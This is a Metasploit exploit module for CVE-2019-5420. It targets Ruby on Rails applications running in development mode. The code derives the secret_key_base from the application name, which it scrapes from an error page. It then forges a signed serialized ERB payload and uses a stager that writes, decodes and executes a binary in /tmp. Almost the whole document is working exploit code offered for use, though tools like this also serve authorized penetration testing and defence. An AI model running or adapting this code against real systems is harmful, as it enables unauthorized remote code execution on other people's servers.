Ruby On Rails - DoubleTap Development Mode secret_key_base Remote Code Execution (Metasploit)

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Ruby On Rails DoubleTap Development Mode secret_key_base Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability in Ruby on Rails. In development mode, a Rails
        application would use its name as the secret_key_base, and can be easily extracted by
        visiting an invalid resource for a path. As a result, this allows a remote user to
        create and deliver a signed serialized payload, load it by the application, and gain
        remote code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'ooooooo_q', # Reported the vuln on hackerone
          'mpgn',      # Proof-of-Concept
          'sinn3r'     # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-5420' ],
          [ 'URL', 'https://hackerone.com/reports/473888' ],
          [ 'URL', 'https://github.com/mpgn/Rails-doubletap-RCE' ],
          [ 'URL', 'https://groups.google.com/forum/#!searchin/rubyonrails-security/CVE-2019-5420/rubyonrails-security/IsQKvDqZdKw/UYgRCJz2CgAJ' ]
        ],
      'Platform'       => 'linux',
      'Targets'        =>
        [
          [ 'Ruby on Rails 5.2 and prior', { } ]
        ],
      'DefaultOptions' =>
        {
          'RPORT' => 3000
        },
      'Notes'          =>
        {
          'AKA'         => [ 'doubletap' ],
          'Stability'   => [ CRASH_SAFE  ],
          'SideEffects' => [ IOC_IN_LOGS ]
        },
      'Privileged'     => false,
      'DisclosureDate' => 'Mar 13 2019',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']),
      ])
  end

  NO_RAILS_ROOT_MSG = 'No Rails.root info'

  # These mocked classes are borrowed from Rails 5. I had to do this because Metasploit
  # still uses Rails 4, and we don't really know when we will be able to upgrade it.

  class Messages
    class Metadata
      def initialize(message, expires_at = nil, purpose = nil)
        @message, @expires_at, @purpose = message, expires_at, purpose
      end

      def as_json(options = {})
        { _rails: { message: @message, exp: @expires_at, pur: @purpose } }
      end

      def self.wrap(message, expires_at: nil, expires_in: nil, purpose: nil)
        if expires_at || expires_in || purpose
          ActiveSupport::JSON.encode new(encode(message), pick_expiry(expires_at, expires_in), purpose)
        else
          message
        end
      end

      private

      def self.pick_expiry(expires_at, expires_in)
        if expires_at
          expires_at.utc.iso8601(3)
        elsif expires_in
          Time.now.utc.advance(seconds: expires_in).iso8601(3)
        end
      end

      def self.encode(message)
        Rex::Text::encode_base64(message)
      end
    end
  end

  class MessageVerifier
    def initialize(secret, options = {})
      raise ArgumentError, 'Secret should not be nil.' unless secret
      @secret = secret
      @digest = options[:digest] || 'SHA1'
      @serializer = options[:serializer] || Marshal
    end

    def generate(value, expires_at: nil, expires_in: nil, purpose: nil)
      data = encode(Messages::Metadata.wrap(@serializer.dump(value), expires_at: expires_at, expires_in: expires_in, purpose: purpose))
      "#{data}--#{generate_digest(data)}"
    end

    private

    def generate_digest(data)
      require "openssl" unless defined?(OpenSSL)
      OpenSSL::HMAC.hexdigest(OpenSSL::Digest.const_get(@digest).new, @secret, data)
    end

    def encode(message)
      Rex::Text::encode_base64(message)
    end
  end

  def check
    check_code = CheckCode::Safe
    app_name = get_application_name
    check_code = CheckCode::Appears unless app_name.blank?
    test_payload = %Q|puts 1|
    rails_payload = generate_rails_payload(app_name, test_payload)
    result = send_serialized_payload(rails_payload)
    check_code = CheckCode::Vulnerable if result
    check_code
  rescue Msf::Exploit::Failed => e
    vprint_error(e.message)
    return check_code if e.message.to_s.include? NO_RAILS_ROOT_MSG
    CheckCode::Unknown
  end

  # Returns information about Rails.root if we retrieve an invalid path under rails.
  def get_rails_root_info
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(target_uri.path, 'rails', Rex::Text.rand_text_alphanumeric(32)),
    })

    fail_with(Failure::Unknown, 'No response from the server') unless res
    html = res.get_html_document
    rails_root_node = html.at('//code[contains(text(), "Rails.root:")]')
    fail_with(Failure::NotVulnerable, NO_RAILS_ROOT_MSG) unless rails_root_node
    root_info_value = rails_root_node.text.scan(/Rails.root: (.+)/).flatten.first
    report_note(host: rhost, type: 'rails.root_info', data: root_info_value, update: :unique_data)
    root_info_value
  end

  # Returns the application name based on Rails.root. It seems in development mode, the
  # application name is used as a secret_key_base to encrypt/decrypt data.
  def get_application_name
    root_info = get_rails_root_info
    root_info.split('/').last.capitalize
  end

  # Returns the stager code that writes the payload to disk so we can execute it.
  def get_stager_code
    b64_fname = "/tmp/#{Rex::Text.rand_text_alpha(6)}.bin"
    bin_fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}.bin"
    register_file_for_cleanup(b64_fname, bin_fname)
    p = Rex::Text.encode_base64(generate_payload_exe)

    c  = "File.open('#{b64_fname}', 'wb') { |f| f.write('#{p}') }; "
    c << "%x(base64 --decode #{b64_fname} > #{bin_fname}); "
    c << "%x(chmod +x #{bin_fname}); "
    c << "%x(#{bin_fname})"
    c
  end

  # Returns the serialized payload that is embedded with our malicious payload.
  def generate_rails_payload(app_name, ruby_payload)
    secret_key_base = Digest::MD5.hexdigest("#{app_name}::Application")
    keygen = ActiveSupport::CachingKeyGenerator.new(ActiveSupport::KeyGenerator.new(secret_key_base, iterations: 1000))
    secret = keygen.generate_key('ActiveStorage')
    verifier = MessageVerifier.new(secret)
    erb = ERB.allocate
    erb.instance_variable_set :@src, ruby_payload
    erb.instance_variable_set :@filename, "1"
    erb.instance_variable_set :@lineno, 1
    dump_target = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result)
    verifier.generate(dump_target, purpose: :blob_key)
  end

  # Sending the serialized payload
  # If the payload fails, the server should return 404. If successful, then 200.
  def send_serialized_payload(rails_payload)
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => "/rails/active_storage/disk/#{rails_payload}/test",
    })

    if res && res.code != 200
      print_error("It doesn't look like the exploit worked. Server returned: #{res.code}.")
      print_error('The expected response should be HTTP 200.')

      # This indicates the server did not accept the payload
      return false
    end

    # This is used to indicate the server accepted the payload
    true
  end

  def exploit
    print_status("Attempting to retrieve the application name...")
    app_name = get_application_name
    print_status("The application name is: #{app_name}")

    stager = get_stager_code
    print_status("Stager ready: #{stager.length} bytes")

    rails_payload = generate_rails_payload(app_name, stager)
    print_status("Sending serialized payload to target (#{rails_payload.length} bytes)")
    send_serialized_payload(rails_payload)
  end
end